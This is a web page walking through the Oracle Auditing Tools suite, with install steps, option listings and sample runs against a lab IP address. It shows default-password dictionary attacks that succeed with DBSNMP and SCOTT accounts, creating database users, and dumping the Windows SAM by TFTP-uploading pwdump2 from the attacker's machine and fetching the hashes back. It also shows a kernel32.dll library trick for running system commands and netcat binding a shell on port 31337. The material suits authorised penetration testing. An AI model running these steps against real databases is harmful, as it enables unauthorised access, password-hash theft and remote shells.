The Web Local
 

 

 

Oracle Auditing Tools (OAT)

 

OAT is a suite of tools that can be used to enumerate default Oracle accounts, query the TNS listener, open an SQL prompt or setup a TFTP session for transfer of a netcat executable to the remote database.  The suite consists of the following tools:

 

  • Oracle Password Guesser (opwg) - Used to enumerate a SID/multiple SID's for default usernames and passwords.  The in-built accounts.default file contain 120+ username/ password pairs that will be automatically tried.

 

  • OracleQuery (oquery) With credentials obtained previously from opwg sets up a pl/sql prompt enabling the using to interactively query the Oracle database.

 

  • OracleSamDump (osd) - Connects to the remote Oracle server and executes a TFTP get, to fetch the pwdump2 binary. The server is then pwdump2:ed and the result is TFTP'd back to the SAM folder of the TFTP server.

 

  • OracleSysExec (ose) - Can be run in interactive mode, letting the user specify commands to be executed by the server or in automatic mode. In automatic mode, netcat is TFTP'd over to the Oracle database server and binds a shell to the TCP port 31337.

 

  • OracleTNSCtrl (otnsctl.sh) - is used to query the TNS listener for various information, like the Oracle lsnrctl utility. It is somewhat limited though.

 

Pre-requirements

 

  • OAT zip file

  • Oracle JDBC driver, which can be obtained from Oracle or simply by searching the internet for classes12.zip (or from me here.)
  • Java Runtime Environment

 

Installation

 

Unix/ Linux

Copy the files to a suitable directory

Modify the path to the JDBC driver in all .sh files, normally:

Location_saved/classes12.zip

You also need to vi the *.sh files and amend the line JAVA= so that the correct path to the java executable is displayed i.e.:

JAVA=/usr/java/j2re1.4.2_08/bin/java

chmod 744 opwg.sh (and all the other .sh files, they are by default rw only on initial install)

 

Windows

Modify the path to the java binary in the .bat files.

Modify the path to the JDBC driver, normally:

[ORACLE_HOME]\jdbc\lib\classes111.zip or [ORACLE_HOME]\jdbc\lib\classes12.zip

 

N.B      accounts.default file has only 120+ standard username/password pairs, to enable a check of the 600 known Oracle default accounts change this file with my prepared one here.

 

Command Syntax

Note:- Files in brackets below are .sh (Linux) and .bat (Windows)

 

OraclePasswordGuesser (opwg)

Oracle Account dictionary attack tool.

C:\Oracle\oat>opwg

        Oracle Password Guesser v1.3.1 by patrik@cqure.net

        --------------------------------------------------

        OraclePwGuess [options]

                -s*     <servername>

                -u      <userfile>

                -p      <passfile>

                -d      <SID>

                -P      <portnr>

                -D      disables default pw checks

                -C      check for CREATE LIBRARY permissions

                -v      be verbose

[root@localhost oat]# sh opwg.sh -s 200.100.100.218 OR c:\opwg -s 200.100.100.218

Oracle Password Guesser v1.3.1 by patrik@cqure.net

--------------------------------------------------

Skipping PLSExtProc ...

INFO: Running pwcheck on SID test

Successfully logged in with DBSNMP/DBSNMP

Successfully logged in with SCOTT/TIGER

 

Note:- Due to extra security features within Oracle 10g Release 2, the use of this program will provide limited results, unless you first of all provide the SID.  This limits it somewhat and it is better off using oscanner.

 

OracleQuery (oquery)

Allows interactive SQL queries against the database

C:\Oracle\oat>oquery

        OracleQuery v1.3.1 by patrik@cqure.net

        ----------------------------------------

        OracleQuery [options]

                -s*     <servername>

                -u*     <username>

                -p*     <password>

                -d*     <SID>

                -P      <portnr>

                -v      be verbose

                -q      <query>

                -o      <outfile>

                -m      <tabledelimiter>

[localhost oat]# sh oquery.sh -s 200.100.100.218 -u scott -p tiger -d test OR c:\oquery -s 200.100.100.218 -u scott -p tiger -d test

OracleQuery v1.3.1 by patrik@cqure.net

----------------------------------------

pl/sql>  create user "[Username]" identified by "[Password]"

 

Will create an account and set the password for it - remember the ""!

 

OracleSamDump (osd)

Connects to the Oracle server and executes TFTP get, to fetch the pwdump2 binary. The server is then pwdump2:ed and the result is returned to the SAM folder of the TFTP server.

C:\Oracle\oat>osd

        Oracle Sam Dump v1.3.1 by patrik@cqure.net

        ------------------------------------------

        OracleSamDump [options]

                -s*     <servername>

                -u      <username>

                -p      <password>

                -d      <SID>

                -P      <portnr>

                -l      <localIP>

                -T      <temppath>

                -v      be verbose

[root@localhost oat]# sh osd.sh -s 200.100.100.218 -u scott -p tiger -d test OR c:\ osd -s 200.100.100.218 -u scott -p tiger -d test

 Oracle Sam Dump v1.3.1 by patrik@cqure.net

------------------------------------------

INFO: Local IP seems to be 200.100.100.208

SERVER:[2] Tftp Server thread started.

ERROR: create library elite_haxxor_lib as '%windir%\system32\kernel32.dll';

INFO: Uploading PWDUMP2 to Oracle Server

INFO: Dumping the SAM on Oracle Server

INFO: Fetching sam.txt

INFO: If all went well, the server SAM file should be in tftproot/sam

INFO: Cleaning up !

ERROR: drop library elite_haxxor_lib

INFO: Stopping TFTP Server

 

OracleSysExec (ose)

C:\Oracle\oat>ose

        OracleSysExec v1.3.1 by patrik@cqure.net

        ----------------------------------------

        OracleSysExec [options]

                -s*     <servername>

                -u      <username>

                -p      <password>

                -d      <SID>

                -P      <portnr>

                -l      <localIP>

                -T      <temppath>

                -t      <platform>

                -I      interactive mode

                -v      be verbose

[root@localhost oat]# sh ose.sh -s 200.100.100.218 -u scott -p tiger -d test -t Windows OR c:\ ose -s 200.100.100.218 -u scott -p tiger -d test -t Windows

-t = Windows or Solaris (Depending on target platform)

 

OracleTNSCtrl (otnsctl.sh)

Used to query the TNS listener for various information, like the Oracle lsnrctl utility. It is somewhat limited though. Use the help command to see commands currently implemented.

C:\Oracle\oat>otnsctl

Oracle TNS Control v1.3.1 by patrik@cqure.net

---------------------------------------------

OracleTNSCtrl [options]

          -s*     <servername>

          -P      <portnr>

          -c      command to execute (status/services/version/etc.)

          -I*     interactive mode

          -v      be verbose

[root@localhost oat]# sh otnsctl.sh -s 200.100.100.218 I OR c:\otnsctl -s 200.100.100.218 I

 Oracle TNS Control v1.3.1 by patrik@cqure.net

---------------------------------------------

tnscmd> help

help

set password - sets the password with which to connect to the listener

services - shows services version

status - shows status

version - returns version information

 

Pen Testing Framework:

 

Latest Tool Reviews: